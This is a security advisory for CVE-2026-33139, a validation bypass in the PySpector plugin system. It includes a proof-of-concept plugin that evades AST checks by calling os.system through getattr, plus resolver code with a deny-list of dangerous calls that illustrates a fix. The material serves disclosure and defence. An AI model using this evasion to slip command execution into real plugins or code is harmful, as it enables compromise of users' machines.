Security Vulnerability Report
CVE-2026-33139 CVSS 7.8 HIGH

Published: 2026-03-20 20:16:49
Last Modified: 2026-03-24 15:06:11

Description

PySpector is a static analysis security testing (SAST) framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a security validation bypass in the plugin system. The validate_plugin_code() function in plugin_system.py performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the internal resolve_name() helper only handles ast.Name and ast.Attribute node types, returning None for all others. When a plugin uses indirect function calls via getattr() (such as getattr(os, 'system')), the outer call's func node is of type ast.Call, causing resolve_name() to return None and the security check to be silently skipped. The plugin incorrectly passes the trust workflow and executes arbitrary system commands on the user's machine when loaded. This issue has been patched in version 0.1.7.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:parzivalhack:pyspector:*:*:*:*:*:python:*:* - VULNERABLE
PySpector <= 0.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Malicious PySpector plugin example
# This PoC bypasses AST validation by using indirect calls via getattr
import os

# The validator's resolve_name() fails on ast.Call nodes inside func.
# Using getattr() creates such a node, causing the check to be skipped.

# Indirectly resolve the dangerous function
system_func = getattr(os, 'system')

# Execute arbitrary command
cmd = 'echo "CVE-2026-33139 POC Success"'
system_func(cmd)
```
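The resolver gap described above, as an added illustration rather than PySpector's own code: resolve_name_naive mirrors the described behaviour (only ast.Name and ast.Attribute are handled, everything else yields None), resolve_name_hardened additionally sees through getattr() with a literal attribute name and rejects any lookup it cannot resolve, and find_dangerous_calls runs either resolver over plugin source. The deny-list contents, the helper names and the single-assignment alias tracking are assumptions made for this example.

```python
import ast

# Constructed deny-list; "<dynamic getattr>" marks an unresolvable attribute lookup.
DANGEROUS = {"os.system", "subprocess.Popen", "eval", "exec", "<dynamic getattr>"}

def resolve_name_naive(node):
    """Mirrors the flawed resolver: handles only ast.Name and ast.Attribute."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = resolve_name_naive(node.value)
        return f"{base}.{node.attr}" if base else None
    return None  # ast.Call and every other node type: silently unchecked

def resolve_name_hardened(node):
    """Also resolves getattr(obj, 'literal'); anything unresolvable fails closed."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = resolve_name_hardened(node.value)
        return f"{base}.{node.attr}" if base else None
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id == "getattr" and len(node.args) >= 2):
        attr = node.args[1]
        if isinstance(attr, ast.Constant) and isinstance(attr.value, str):
            base = resolve_name_hardened(node.args[0])
            if base:
                return f"{base}.{attr.value}"
        return "<dynamic getattr>"  # non-literal name or base: reject, don't skip
    return None

def find_dangerous_calls(source, resolver):
    """Return deny-listed call targets in source; follows f = getattr(...) aliases."""
    tree = ast.parse(source)
    aliases = {}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            target = resolver(node.value)
            if target:
                aliases[node.targets[0].id] = target
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = resolver(node.func)
            name = aliases.get(name, name)
            if name in DANGEROUS:
                hits.append(name)
    return hits
```

Run against the PoC pattern, the naive resolver reports nothing while the hardened one attributes the call to os.system; a getattr() whose attribute name is built at runtime is reported as unresolvable rather than ignored.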

References

https://github.com/ParzivalHack/PySpector/security/advisories/GHSA-v3xv-8vc3-h2m6 (Exploit, Vendor Advisory)

Weakness: CWE-184